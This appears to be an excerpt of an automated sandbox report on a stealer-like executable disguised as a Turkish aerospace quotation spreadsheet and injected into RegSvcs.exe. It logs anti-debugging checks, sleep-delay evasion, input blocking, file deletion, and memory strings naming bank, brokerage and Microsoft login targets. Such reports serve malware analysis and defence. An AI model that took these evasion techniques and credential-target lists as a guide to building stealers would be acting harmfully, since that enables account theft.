Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594838	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594266	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8221			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1621			Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

API coverage: 3.8 %

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_001EDBBE
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001BC2A2 FindFirstFileExW,	0_2_001BC2A2
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001F68EE FindFirstFileW,FindClose,	0_2_001F68EE
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_001F698F
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001ED076
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001ED3A9
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_001F9642
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_001F979D
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_001F9B2B
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001F5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_001F5C97

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001842DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598988	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594838	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594266	Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2657054138.0000000000855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 2_2_050E9548 LdrInitializeThunk,LdrInitializeThunk,

2_2_050E9548

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001FEAA2 BlockInput,

0_2_001FEAA2

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_001B2622

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001842DE

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A4CE8 mov eax, dword ptr fs:[00000030h]	0_2_001A4CE8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_018A0648 mov eax, dword ptr fs:[00000030h]	0_2_018A0648
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_018A1CA8 mov eax, dword ptr fs:[00000030h]	0_2_018A1CA8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_018A1C48 mov eax, dword ptr fs:[00000030h]	0_2_018A1C48

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_001E0B62

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001B2622
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001A083F
